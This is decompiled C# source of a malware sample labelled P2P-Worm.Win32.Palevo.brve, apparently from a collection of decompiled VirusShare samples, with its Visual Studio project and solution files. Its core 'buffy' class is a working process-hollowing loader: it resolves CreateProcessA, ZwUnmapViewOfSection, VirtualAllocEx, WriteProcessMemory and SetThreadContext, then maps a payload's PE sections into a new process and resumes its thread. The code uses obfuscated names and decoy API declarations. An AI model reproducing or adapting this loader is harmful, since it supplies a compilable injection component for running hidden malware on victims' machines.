long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
int num18 = 0;
while (num18 <= num17)
{
ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
buffy.Section_Header sectionHeader1;
object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
buffy.Section_Header sectionHeader2;
sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
int index = 0;
while (index <= num19)
{
numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
checked { ++index; }
}
buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
byte[] DSAE32_2 = numArray;
int da22S3 = checked ((int) sectionHeader1.DA22S3);
int num20 = checked ((int) num15);
ref int local13 = ref num20;
int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
num15 = checked ((uint) num20);
checked { ++num18; }
}
object bytes = (object) BitConverter.GetBytes(num11);
buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
byte[] DSAE32_3 = (byte[]) bytes;
int num22 = checked ((int) num15);
ref int local14 = ref num22;
int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
num12 = checked ((uint) num22);
NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
{
(object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
}, (string[]) null, (Type[]) null);
buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
object obj29 = Instance6;
context2 = obj29 != null ? (buffy.Context) obj29 : context1;
ref buffy.Context local15 = ref context2;
int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
object obj30 = (object) context2;
buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
int num25 = (int) ws2XvbnvO9_2(DASEAS);
}
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
[DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RpcNsProfileEltAdd(
long ProfileNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
ref IntPtr IfId,
long MemberNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
long Priority,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
[DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
[DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
[DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MgmGetNextMfeStats(
ref IntPtr pimmStart,
ref long pdwBufferSize,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
ref long pdwNumEntries);
[DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MprAdminDeviceEnum(
ref IntPtr hMprServer,
long dwLevel,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
ref long lpdwTotalEntries);
[DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MsiDatabaseImport(
ref IntPtr hDatabase,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
[DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetReplExportDirSetInfo(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
ref long parm_err);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetUseGetInfo(
ref IntPtr UncServerName,
ref IntPtr UseName,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsoleInput(
long hConsoleInput,
ref IntPtr lpBuffer,
long nLength,
ref long lpNumberOfEventsRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
[DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SnmpMgrCtl(
ref IntPtr session,
long dwCtlCode,
ref long lpvInBuffer,
long cbInBuffer,
ref long lpvOUTBuffer,
long cbOUTBuffer,
ref long lpcbBytesReturned);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long AddAuditAccessAceEx(
IntPtr pAcl,
long dwAceRevision,
long AceFlags,
long dwAccessMask,
ref IntPtr pSid,
long bAuditSuccess,
long bAuditFailure);
[DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLInstallerError(
int iError,
ref long pfErrorCode,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
int cbErrorMsgMax,
ref int pcbErrorMsg);
[DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
[DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RasSetCredentials(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
ref IntPtr TLPRASCREDENTIALSA,
long @bool);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsole(
long hConsoleInput,
ref long lpBuffer,
long nNumberOfCharsToRead,
ref long lpNumberOfCharsRead,
ref long lpReserved);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadEncryptedFileRaw(
ref IntPtr pfExportCallback,
ref long pvCallbackContext,
ref long pvContext);
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadPrinter(
long hPrinter,
ref long pBuf,
long cdBuf,
ref long pNoBytesRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReleaseSemaphore(
long hSemaphore,
long lReleaseCount,
ref long lpPreviousCount);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
[DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetStringTypeEx(
long Locale,
long dwInfoType,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
long cchSrc,
ref int lpCharType);
[DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetVolumePathName(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
long cchBufferLength);
[DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr ToAscii(
long uVirtKey,
long uScanCode,
ref byte lpbKeyState,
ref long lpwTransKey,
long fuState);
private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
public struct Context
{
public uint II69TOHMUR;
public uint d2;
public uint das;
public uint d9;
public uint ad;
public uint dsa;
public uint ds;
public buffy.Save Save;
public uint dh;
public uint sad;
public uint da;
public uint MD;
public uint RD;
public uint mSI;
public uint WDA;
public uint AD3;
public uint D21;
public uint AS4;
public uint K32;
public uint F2W;
public uint HHJ;
public uint ADF5;
public uint GSSA;
public uint DSAAA;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] er6rgdr65;
}
public struct Save
{
public uint KD7JX2MXT;
public uint JCNS3ZPSXO;
public uint DAS3;
public uint DAS23;
public uint ADSA;
public uint DAF35;
public uint FA32D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] FSDRF43;
public uint FA32QA;
}
public struct Misc
{
public uint SDUHRL;
public uint GSIJ;
}
public struct Section_Header
{
public byte FSDPOU4PO3;
public buffy.Misc Mi2sc;
public uint AL8ZCRFWNU;
public uint DA22S3;
public uint PoinEEter;
public uint E2Q4RS;
public uint FS523QF;
public uint FSB43FSD4;
public uint QBFAS4E;
public uint AS32QFZS;
}
public struct Process_Information
{
public IntPtr DAS4QQW;
public IntPtr RFSER;
public int TGJWE;
public int SDFFFFFFFFFF;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct Startup_Information
{
public int CSZE;
public string FSDR4G;
public string AAAAAAAAAA;
public string AADDDDDDD;
public int ADA;
public int C;
public int AEDS;
public int DASDDDD;
public int XASE4;
public int DAS3EDFZ;
public int DVA3ES;
public int CCCCQ;
public short FDSRS;
public short VYE5X;
public int KHJKIHJK;
public int KHJKHJK;
public int KHJKHJ;
public int KHJKJHK;
}
public struct Security_Flags
{
public int GFSETWE;
public IntPtr EWEWWW;
public int DASDAS;
}
public struct DOS_Header
{
public ushort DASDASFASF;
public ushort QWEQWE;
public ushort EQWEQWEQWE;
public ushort HFGHFGHFGH;
public ushort HFGHFGHFG;
public ushort DASD444444;
public ushort DASFASE33;
public ushort DASKGHJ;
public ushort DASVZDF;
public ushort VXCVXC;
public ushort VXCVXCV;
public ushort EWECS;
public ushort EWADC;
public ushort UADA3;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] ReservWWWWWWWWWWWWWWWedA;
public ushort DAS4E;
public ushort UJJ;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] DDDDDDDDD;
public int DASE3ASDAS;
}
public struct NT_Headers
{
public uint SSSSSSSSSSSQ;
public buffy.File_Header DSEEEEE;
public buffy.Optional_Headers OOOU;
}
public struct File_Header
{
public ushort ITTTTTTTT;
public ushort DAAAAAAAA3;
public uint HRFTYTYTR;
public uint GJGFSFS;
public uint FSVGY;
public ushort FSFV;
public ushort A34FFC;
}
public struct Optional_Headers
{
public ushort WWWWWWWWW;
public byte MaAAAAAAAAAAAjor;
public byte MiSSSSSSSSSSSnor;
public uint SSSSSSSSSSSSS;
public uint FFFFFFFFFFF;
public uint XXXXXXXX;
public uint DDDDDDDDAAA;
public uint FSSSSSSS;
public uint RSFS43;
public uint DFAZDASD;
public uint SectionA;
public uint FileA;
public ushort GDFTDFFFF;
public ushort HGDFHD564;
public ushort GD5ERGD;
public ushort FSD5YHD;
public ushort ASDASG;
public ushort AS4ASAS;
public uint CCC;
public uint DASRDASRASR;
public uint WQDASDASD;
public uint Assssssss;
public ushort fsd4s;
public ushort fjio;
public uint dasrlajstpoi;
public uint dasdraskyjhuasp;
public uint SHRedas4wa9uqserve;
public uint fsdtsysyt;
public uint eawdasdas3;
public uint Cocccunt;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public buffy.Data_Directory[] GSDGSDT4;
}
public struct Data_Directory
{
public uint ewq34q234;
public uint das34aw33;
}
public delegate bool GN04L0ER8I(
string ASFASE3,
string DASDAS3E2,
ref buffy.Security_Flags DASCASE,
ref buffy.Security_Flags CASE222,
bool DAS432E,
uint AEDFKJK32,
IntPtr DSA43R3W,
string ase32ew,
[In] ref buffy.Startup_Information das43fsa,
out buffy.Process_Information das3);
public delegate bool ZGOQ8VM05M(
IntPtr DASE32,
int AL8ZCRFWNU,
byte[] DSAE32,
int DASEADAS,
out int ASD43FA);
public delegate int Q7QRRP639W(
IntPtr FASFDASDAS,
int AL8ZCRFWNU,
ref int CAS32,
int ASDASC,
ref int CASTWE);
public delegate IntPtr W6CTR6GLCC(
IntPtr DASE43E,
int AL8ZCRFWNU,
uint DASCAS3,
uint DAS3,
uint DAS32);
public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
public delegate uint WS2XVBNVO9(IntPtr DASEAS);
public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/pizde.cs
+645
View File
File diff suppressed because one or more lines are too long
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/P2P-Worm.Win32.Palevo.brve.csproj
+46
View File
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>cfncfn</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>My</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="pizde.cs" />
<Compile Include="buffy.cs" />
<Compile Include="MyApplication.cs" />
<Compile Include="MyComputer.cs" />
<Compile Include="MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/P2P-Worm.Win32.Palevo.brve.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "cfncfn", "P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.csproj", "{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Debug|Any CPU.Build.0 = Debug|Any CPU
{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Release|Any CPU.ActiveCfg = Release|Any CPU
{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/buffy.cs
+632
View File
@@ -0,0 +1,632 @@
// Decompiled with JetBrains decompiler
// Type: buffy
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
public class buffy
{
public const long ASDFASFASF = 2778;
public const long FASFASFASF = 60116;
public const long AFSFASFASCFC = 218;
public const long ASDASCASDASD = 218;
public const long BVCXBXCBXCB = 218;
public const long BXCBXCBXCB = 253;
public const long FSDR3FSF = 218;
public const long KKKKKKKKKDDDDDDD = 17247;
public const uint FSSSSSSSSSSSSSSSSSS = 218;
public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
{
object Instance1 = (object) new buffy.Context();
object obj1 = (object) new buffy.Process_Information();
object obj2 = (object) new buffy.Startup_Information();
object obj3 = (object) new buffy.Security_Flags();
object obj4 = (object) new buffy.Security_Flags();
object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
Type Type = typeof (Marshal);
object[] objArray1 = new object[2];
object[] objArray2 = objArray1;
object Instance3 = Instance2;
object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
objArray2[0] = objectValue;
objArray1[1] = (object) dosHeader1.GetType();
object[] objArray3 = objArray1;
object[] Arguments = objArray3;
bool[] flagArray = new bool[2]{ true, false };
bool[] CopyBack = flagArray;
object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
if (flagArray[0])
NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
{
RuntimeHelpers.GetObjectValue(objArray3[0])
}, (string[]) null, (Type[]) null, true, false);
buffy.DOS_Header dosHeader2;
buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
string DASDAS3E2_1 = VVVVVVCAE;
object obj6 = obj3;
buffy.Security_Flags securityFlags1;
buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
ref buffy.Security_Flags local1 = ref securityFlags2;
object obj7 = obj4;
buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
ref buffy.Security_Flags local2 = ref securityFlags3;
IntPtr num1;
IntPtr DSA43R3W1 = num1;
object obj8 = obj2;
